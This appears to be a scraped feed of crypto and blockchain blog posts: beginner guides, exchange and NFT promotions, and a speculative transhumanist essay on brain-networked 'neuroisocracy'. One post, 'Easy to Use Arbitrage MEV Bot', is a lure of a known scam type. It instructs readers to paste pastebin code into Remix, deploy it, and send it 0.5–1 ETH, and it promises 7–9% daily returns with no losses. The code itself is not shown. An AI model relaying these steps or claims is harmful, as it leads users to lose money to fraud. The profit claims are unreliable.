Diversification involves allocating funds across different cryptocurrencies to minimize risk. Consider a mix of established and promising projects.
What are the security risks associated with cryptocurrency?
Security risks include hacking, fraud, and the potential for technological vulnerabilities. Using secure wallets and practicing good cybersecurity habits is crucial.
How often should I review my cryptocurrency portfolio?
Regularly review your portfolio to stay informed about market trends and adjust your strategy based on changing conditions.
Navigating the world of cryptocurrency investments requires a combination of research, risk management, and a forward-looking perspective. By understanding the factors influencing the market and exploring the best cryptocurrency options available, investors can make informed decisions that align with their financial goals.
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allweb3 · 9 months
Cryptocurrency for Beginners: Essential Insights and Guidance
Cryptocurrency, a digital and decentralized form of money, has transformed the way we think about finance and technology.
For beginners, navigating the world of cryptocurrency can be both exciting and overwhelming.
This article serves as a comprehensive guide, offering beginners insights into the fundamental aspects, benefits, risks, and practical steps to get started in the cryptocurrency realm.
Understanding Cryptocurrency: The Basics
At its core, cryptocurrency is a digital or virtual form of currency that utilizes cryptographic techniques to secure transactions and control the creation of new units.
Unlike traditional currencies issued by governments and central banks, cryptocurrencies operate on decentralized networks, typically based on blockchain technology.
1. How Cryptocurrencies Work
Cryptocurrencies operate on blockchain technology, which is a distributed and immutable ledger that records all transactions.
Each transaction is grouped into a "block," and these blocks are linked together, creating a chain of information.
This decentralized nature ensures transparency, security, and resistance to censorship as Perseus Crypto explains it nicely.
2. Key Cryptocurrency Concepts
Blockchain: A decentralized ledger that records all transactions in a secure and transparent manner.
Wallet: A digital tool that stores your cryptocurrency holdings, enabling you to send, receive, and manage your coins.
Private and Public Keys: Cryptographic keys that grant access to your cryptocurrency. The public key is like an address, while the private key is your password.
Mining: The process of validating transactions and adding them to the blockchain using powerful computers and solving complex mathematical puzzles.
Benefits of Cryptocurrency
1. Financial Inclusion: Cryptocurrencies enable access to financial services for the unbanked and underbanked populations around the world.
2. Decentralization: Cryptocurrencies operate on decentralized networks, reducing the influence of central authorities and intermediaries.
3. Security: Blockchain's cryptographic techniques ensure secure transactions and protection against fraud and hacking.
4. Transparency: Transactions on a blockchain are public and transparent, enhancing accountability.
5. Borderless Transactions: Cryptocurrencies enable fast and low-cost cross-border transactions.
6. Potential for Growth: Some cryptocurrencies have experienced significant price appreciation, offering opportunities for investment growth.
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Risks and Considerations
1. Volatility: Cryptocurrency prices can be highly volatile, leading to rapid and unpredictable value changes.
2. Security Concerns: Cryptocurrencies are susceptible to hacking, scams, and phishing attacks. Secure storage is crucial.
3. Regulatory Environment: Regulations for cryptocurrencies vary by jurisdiction and can impact their legality, taxation, and use.
4. Lack of Understanding: The complexity of the technology and market can lead to uninformed decisions.
5. Lack of Regulation: The decentralized nature of cryptocurrencies means there may be no recourse for fraudulent activities or disputes.
Getting Started with Cryptocurrency
1. Education Is Key
Before investing in or using cryptocurrencies, educate yourself about the technology, terminology, and potential risks.
Numerous online resources, courses, and communities provide valuable insights.
2. Choose the Right Cryptocurrency
Research different cryptocurrencies to understand their purposes, use cases, and market trends.
Bitcoin, Ethereum, and others have distinct features and applications.
3. Select a Reliable Exchange
Choose a reputable cryptocurrency exchange to buy, sell, and trade cryptocurrencies.
Look for factors like security measures, fees, user-friendliness, and available coins.
4. Secure Your Investments
Use strong, unique passwords for your exchange accounts and enable two-factor authentication (2FA).
Consider using hardware wallets for enhanced security.
5. Start Small and Diversify
For beginners, start with a small investment you can afford to lose.
Diversify your investments across different cryptocurrencies to manage risk.
6. Stay Informed
Stay updated with the latest news and trends in the cryptocurrency space.
Follow reputable cryptocurrency news websites, blogs, and social media accounts.
7. Avoid FOMO and Emotional Decisions
Fear of missing out (FOMO) and emotional decisions can lead to impulsive actions.
Stick to your investment strategy and avoid making decisions solely based on short-term price movements.
8. Be Prepared for the Long Term
Cryptocurrency investments are often more successful with a long-term perspective.
Avoid making decisions based on daily market fluctuations.
As you embark on your journey into the world of cryptocurrency, remember that education and caution are your best allies.
Understand the technology, the benefits, and the risks before making any investment decisions.
With the right knowledge and a thoughtful approach, you can navigate the complex and dynamic cryptocurrency landscape, potentially harnessing its benefits and contributing to the evolution of modern finance.
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angelomorphix · 10 months
Neuroisocracy: Polity and Communication
"Signs of transhumanity: sexlessness, artificial reproduction, distributed individuality, and body enhancement with implants." - A prominent representative of the FM-2030 transhumanist movement
Here we will talk about theoretically possible communication and political structure in Angelomorphic society - neural network isocracy, or simply neuroisocracy.
Correct information exchange for better organization of society in the world and its best transformation without unity of consciousness is impossible, but is possible with implementation of interpersonal network technology (distributed individuality by means of Brainet extended neurocommunication technology), which will allow uniting our selves on information level, similar to how it already exists on the foundation level of the universe, based on metaphysical foundations of Angelomorphy and some research. In particular, research suggests that each of us is a kind of alter ego of every other person and of the universe as such.
According to Doctor of Philosophy D. Dubrovsky, overcoming the accumulating global problems is possible by continuing anthropogenesis, changing the biological nature of man. The famous science fiction writer S. Lem was of the same opinion. The philosopher Peter Singer stated that there is a biologically conditioned tendency toward egoism, gender stratification, and hierarchical membership of society, rooted in the very nature of human society and counteracting any attempts at egalitarian social reform. To resolve this problem, new genetic and neurological technologies must be employed to modify aspects of our nature. A new system of communication will become not only a new form of communication, but, as in the case of a new form of reproductive organization of society, an important component of the new political order of the heirs of the human species.
The emergence of the human mind is closely linked to the integration of human beings into human society. Human society is qualitatively different from communities of other mammals because of the ability of humans to create and develop language. It performs two functions: the exchange of information between individuals and the creation of models of reality. These two functions at the level of social integration are analogous to the functions of the nervous system at the level of integration of cells into a multicellular organism.
In the material of language, people create new symbolic models of reality (in particular, scientific and metaphysical theories) that nature has not created at the level of our nervous system. Language is like an extension of the human brain. Moreover, it is a single extension of the brain of all members of society. It is a collective model of reality, which is perfected by all members of society and passed on from generation to generation. It has long been noted that human society can be viewed as a single organism. The body of this organism is the totality of all people and things made by them. Its "physiology" is the culture of society and, above all, language.
Brainet can work as a new type of computational architecture, such as a kind of biological computer, where each member of the distributed network acts as a separate neuron of the whole brain. Brainet is rhizomic, i.e. decentralized between all participants, without a single center, but communicating through distributed networks between selves (living subjects), various systems, databases, etc. The network in the future will be invasive and will grow into the brain while the fetus is still in the womb of the incubator. It should be done exactly at the embryonic stage due to the fact that this is the moment when brain dimorphism is manifested, and for perfect data transfer and perfect mutual understanding the brains should develop approximately equally, and the perception of the Network by the brain should be as natural as possible, as if it were its inseparable part.
It is also only possible to do this with incubator breeding, for obvious reasons.If everything in the world is connected and changeable, then your individuality is also a stream of temporal data, and if there is data coming to you, in particular from other subjects via brain networks, this does not deprive you of a conditioned self.
The example of two Siamese twins from Canada, who were born in 2006 with connected brains, a common thalamus and nervous system, whereby they could communicate with thoughts, sense each other through a common nervous system, and so on, but they had strikingly different personalities, which was noted by their parents.
Trans-personal brain-network, i.e. Self with + sign, when preserving conditional self, you are also distributed throughout the whole rhizomic network, which allows creating, among other things, the most effective ways to manage internal processes of society, technology, and of course information, qualitatively improving it.
From neurocommunication we move to a possible form of political order - to neuroisocracy, as polity under angelomorphism - to a new res publica of new people. According to the philosopher C. Apel, in a society of perfect communication everything is agreed to by all and any decision is the result of the discourses of all participants in communication. Isocracy itself is when each member of society controls the whole system. This means equality before the law and equality in governance. Isocracy extends the concept of liberal rights and their embodiment in a democratic form of government to include the right of ownership of oneself, and of natural resources as a source of public revenue. Protected by constitutional guarantees, isocracy is independent of the vagaries of opinion, a secular and republican form of government. In terms of organizational structure, isocracy stands for a federalist network and a Mutuelist economic order. One might think of it as a direct democracy. Neuro-means that certain previously described neuro-technologies are used to implement such governance. It is essentially a perfected form of networked direct democracy.
The political system would be a fully decentralized system. P2P (peer to peer) implies equality of participants throughout the system. The economy, most likely organized through free cooperation with a common task to create the common good, will be based on equal cooperative production with collegial management and equal ownership - common ownership of producers and consumers. Open cooperatives based on public resources, which differ from collective capitalism and from state economies in their commitment to the creation and expansion of common goods for society, will be places of association and creation, and perhaps even of large families.
We also envision the rejection of all total institutions like prisons, as well as mental hospitals and schools in their modern totalist sense. In parallel with the development of direct networking, a detailed study of the brain is required in order to understand better what real abnormalities may exist in it and whether it is possible to influence them, i.e. we can say that with the development of technology in any case psychiatry will become a full science, without the present prescription of drugs by selection. Education as a whole will make a serious leap upward with development. Prisons, on the other hand, as a disciplinary institution, became obsolete long ago, but still exist as a terrible atavism. There is nothing adequate in the fact that a person is imprisoned for many years in horrible conditions for violating mostly contrived laws from above. In an angelomorphic society, extremely serious crimes can be punished by rewriting a person's identity, but any disciplinary punishments that create a completely unhealthy society these days must be eliminated.
Ant colonies have already been mentioned before, but it is worth dwelling on them again. Each ant colony consists of many sterile females and one or more fertile queens. In fact, the queen's only role is to lay eggs.The queen here is analogous to the artificial intelligence incubator systems of Angelomorphic society, while the entire society is not sterile females, but beings that are asexual and incapable of reproduction.
Neither the queen nor any of the other members of the colony are in a position to assess what to do in any given situation, and none of them commands their congeners. In Angelomorphic society, a similar social paradigm is very likely when neural network communication systems are implemented.
And since we have touched on natural species and their similarities to the future society we are describing, the following points can also be remembered. According to some philosophers, industrial and post-industrial society does not suit man and his nature, it is extremely difficult for man to feel fulfilled here, because man is still essentially a primate, and according to these philosophers he should return to his natural primate life. There may be some truth in this, but that is not what we want to say. By continuing the evolution of man artificially, to his becoming an angelomorph, we change both his nature and his natural needs and stimuli. That is, the natural environment of the angelomorph is no longer the natural environment for the old primitive man, and the new environment of the future is more than natural and desirable for him. If we place an angelomorph and the old man in the conditions of the primitive Stone Age, it is likely that the angelomorph will not feel in his environment, and will simply die out for lack of the same incubators, or if possible make an attempt to reproduce his natural environment. And we think that the economic structure will also be changed in a natural way, because if for humans capitalism at this stage of development is a natural economy, although maybe less natural than hunting and gathering, then for angelomorphs a completely different form of economic and political structure will be natural.
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gwenjasmine · 10 months
The Best Blockchain Platforms to Build Crypto Exchange in 2023
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The cryptocurrency market has experienced remarkable growth and innovation in recent years. As a result, building a robust and secure crypto exchange has become a lucrative venture for many entrepreneurs. One of the key decisions in creating a successful exchange is selecting the right blockchain platform. In this blog, we will see the best blockchain platforms to build a crypto exchange in 2023, considering factors such as scalability, security, flexibility, and developer community support.
About Blockchain Platforms
Blockchain platforms are decentralized networks that enable the creation and execution of blockchain-based applications and smart contracts. A blockchain is a distributed ledger technology that records and stores transactions across multiple computers or nodes. Blockchain platforms provide the infrastructure, tools, and protocols necessary to build and deploy decentralized applications (DApps) and execute smart contracts.
How is Blockchain beneficial for Crypto Exchange Development?
In the context of cryptocurrency exchange development blockchain offers several key benefits,
Global Accessibility 
Innovation and Scalability 
Efficiency and Speed
How can one choose the right Blockchain Platform to build a crypto exchange?
When selecting a Blockchain Platform For Your Crypto Exchange, there are essential factors to consider,
The developmental phase  
Pick the appropriate blockchain network 
Choose an adaptable programming language  
Pick a suitable blockchain platform model  
Select appropriate consensus protocol  
The right smart contract for your platform 
Scalability to your blockchain platform
The widely opted Blockchain Platforms in recent time
The below-listed blockchain platform are some of the blockchains for developers that they can opt for building a block that they need to develop a blockchain platform applications,
IBM Blockchain 
Hyperledger Fabric 
Blockchain Platforms that Investors would look for
For investors, prominent blockchain platforms enable the tokenization of digital securities. By acquiring securitized tokens, you can obtain ownership in companies that have transformed their shares into tokenized assets.
When building a crypto exchange in 2023, selecting the right blockchain platform is crucial for success. Ultimately, the best blockchain platform for building a crypto exchange will depend on specific requirements and these factors will help entrepreneurs to make an informed decision and embark on the journey of creating a successful and thriving crypto exchange in 2023.
Read The Insightful Blog Here To Know More About >>> Best Blockchain Platforms to Build Crypto Exchange in 2023
For More Information Contact,
Whatsapp: +91 9384232288
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rhe-toric · 1 year
Blockchain Use Cases: How it's Being Used in Healthcare, Real Estate, and More!
Blockchain technology is no longer just associated with cryptocurrencies like Bitcoin. In recent years, it has emerged as a game-changing technology with a wide range of applications across various industries. One of the most significant applications of blockchain technology is in healthcare and real estate. In this blog post, we will explore how blockchain is being used in these industries and more.
The healthcare industry is one of the most data-intensive industries. Medical records, patient information, and clinical trials are just a few examples of the vast amount of data that healthcare providers need to manage. Blockchain technology can help healthcare providers manage this data more efficiently and securely.
One of the most significant benefits of blockchain technology in healthcare is the ability to store data securely and transparently. Blockchain technology allows healthcare providers to store patient data in a decentralized network, which means that the data cannot be altered or deleted. This ensures that patient data is secure and protected from cyber attacks.
Another use case of blockchain technology in healthcare is the management of clinical trials. Clinical trials are an essential part of the drug development process, but they are often plagued by inefficiencies and fraud. Blockchain technology can help streamline the clinical trial process by providing a secure and transparent platform for managing trial data.
Real Estate
Real estate is another industry that is ripe for disruption by blockchain technology. One of the most significant challenges in real estate is the lack of transparency and trust between buyers, sellers, and intermediaries. Blockchain technology can help address these challenges by providing a secure and transparent platform for real estate transactions.
One of the most significant benefits of blockchain technology in real estate is the ability to streamline the buying and selling process. Blockchain technology can help automate many of the processes involved in real estate transactions, such as property title transfers, mortgage applications, and property inspections.
Another use case of blockchain technology in real estate is the creation of tokenized assets. Tokenized assets are digital representations of physical assets, such as real estate properties. Tokenization allows investors to buy and sell fractional ownership of these assets, which can help make real estate investing more accessible to a broader range of investors.
Other Use Cases
Blockchain technology has the potential to transform many other industries beyond healthcare and real estate. Here are a few other use cases of blockchain technology:
Supply Chain Management: Blockchain technology can help improve supply chain management by providing a secure and transparent platform for tracking goods and products from manufacturing to delivery.
Identity Management: Blockchain technology can help improve identity management by providing a secure and decentralized platform for storing and managing identity information.
Voting Systems: Blockchain technology can help improve voting systems by providing a secure and transparent platform for recording and counting votes.
Blockchain technology has the potential to transform many industries by providing a secure and transparent platform for managing data and transactions. Healthcare and real estate are just two examples of industries that can benefit from blockchain technology. As blockchain technology continues to evolve, we can expect to see more innovative use cases emerge in the future.
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sough-1 · 11 months
Easy to Use Arbitrage MEV Bot
Check this short video to see how it works and follow the steps below.
Uniswap is a cryptocurrency exchange which uses a decentralized network protocol. If you trade crypto on Uniswap, 1inch or any other decentralized exchange (DEX), then you need to know about front-running bots sniping profits across exchange’s pools.
You are now able to take advantage of those arbitrages yourself, a benefit that was previously only available to highly skilled devs.
Here we provide you the access to user-friendly (no coding skills required) MEV bot so you can enjoy stress-free passive income from day one. It's our flagship project that we recently released which runs on ETH pairs on Uniswap making profits from arbitrage trades.
Using this smart contract source code allows users to create their own MEV bots which stacks up the profits from automatic trades for the users.
We share this Arbitrage MEV bot smart contract for free, but there’s 0.1% fee charged from users’ profits, which goes to us.
How to launch your own arbitrage bot:
     Download MetaMask (if you don’t have it already):
     Access Remix:
3.      Click on the “contracts” folder and then create “New File”. Rename it as you like, i.e: “bot.sol”
Note: If there is a problem if the text is not colored when you create bot.sol and paste the codes from pastebin, try again. If the codes are not colored, you cannot proceed to the next step.
4.      Paste this code in Remix.
5.      Go to the “Solidity Compiler” tab, select version “0.6.6+commit.6c089d02” and then select “Compile bot.sol”.
Make sure “bot.sol” is selected in the CONTRACT section of the SOLIDITY COMPILER section.
6.      Go to the “DEPLOY & RUN TRANSACTIONS” tab, select the “Injected Provider - Metamask” environment and then “Deploy”. By approving the Metamask contract creation fee, you will have created your own contract.
7.      Copy your newly created contract address as shown on video and fund it with any amount of ETH (minimum 0.5-1 ETH recommended) that you would like the bot to earn with by simply sending ETH to your newly created contract address.
8.      After your transaction is confirmed, click the “start” button to run the bot. Withdraw your ETH at any time by clicking the “Withdraw” button.
That’s it. The bot will start working immediately earning you profits from arbitrage trades on Uniswap pools.
If you have any questions or inquiries for assistance, feel free to contact us on Telegram @MEVbotSupport
If many people will use the bot, wouldn’t dilution of profits occur?
We do not plan to limit access to the bot for now because there won’t be any affect for us or our users profiting as pools that the bot works on are with the biggest liquidities and volumes on Uniswap so our users involvement in the pools will always be very minor.
What average ROI can I expect?
According to latest data of bot performances (past 3 weeks) ROI is about +7–9% daily per user. Bot does not make any losses, it only executes trades when there’s proper arbitrage opportunity to make profit, so under all circumstances user is always on plus.
What amount of funds bot need to work?
We recommend funding the contract with at least 0.5-1 ETH to cover gas fees and possible burn fees. Bot targets token contracts with max 10% burn fee and anything lower but nowadays most of tokens comes with 3~6% fees. If you fund the contract with less than recommended and the bot targets another token with high burn fees the contract will basically waste in fees more than make profit.
Does it work on other chains or DEXes as well?
No, currently the bot is dedicated only for Ethereum on Uniswap pools.
Example of the bot's operation, which is shown in the screenshots.
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fadhprag · 11 months
🌟 Exciting News for NFT Creators on Apillon! 🎉
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Hey there, fellow digital artists and blockchain enthusiasts! Have you heard about Apillon? It's a platform that makes building and minting NFTs a breeze. Let me tell you all about it!
Apillon is all about empowering creators like you to unleash your creativity and showcase your unique NFT collections to the world. And guess what? They've partnered with some amazing projects to enhance your NFT experience.
First up, Apillon joined forces with Astar Network, the biggest smart contract platform in the Polkadot ecosystem. This collaboration brings multi-chain smart contract connectivity to Apillon, allowing you to deploy your NFTs across different networks seamlessly.
But wait, there's more! Apillon also integrated Moonbeam Network, which offers smart contract compatibility with Ethereum. Now you have the flexibility to choose the perfect chain for your NFT deployment. Isn't that fantastic?
Imagine creating stunning digital artworks, rare collectibles, or even virtual worlds and easily minting them as NFTs on Apillon. It's like opening a door to a whole new universe where your creativity knows no bounds!
With Apillon, minting your NFT collection is as easy as drag and drop. Plus, they provide secure decentralized storage for your NFT metadata and imagery. No worries about external intrusions - your creations are safe and sound!
And guess what? Apillon even offers a free turnkey solution for showcasing your NFTs. They provide a landing page where you can proudly exhibit your freshly-minted NFT collection. It's a great way to captivate the attention of art lovers and collectors.
The best part? Apillon's user-friendly interface makes the whole process accessible to everyone. Whether you're a seasoned artist or a newbie exploring the world of NFTs, Apillon has got you covered.
So, if you're ready to embark on an exciting NFT-making journey, Apillon is the platform for you. Create, deploy, and mint your unique NFT collections with just a few clicks. The possibilities are endless, and the world is waiting to discover your talent.
Join the Apillon community and let your imagination run wild. Together, we'll revolutionize the world of digital art and empower artists like never before. Let's make waves in the NFT space!
#Apillon #NFTs #DigitalArt #Blockchain #CreativityUnleashed #RevolutionizeArt #JoinTheMovement #Art #Crypto #Digital #Web3 #Developers
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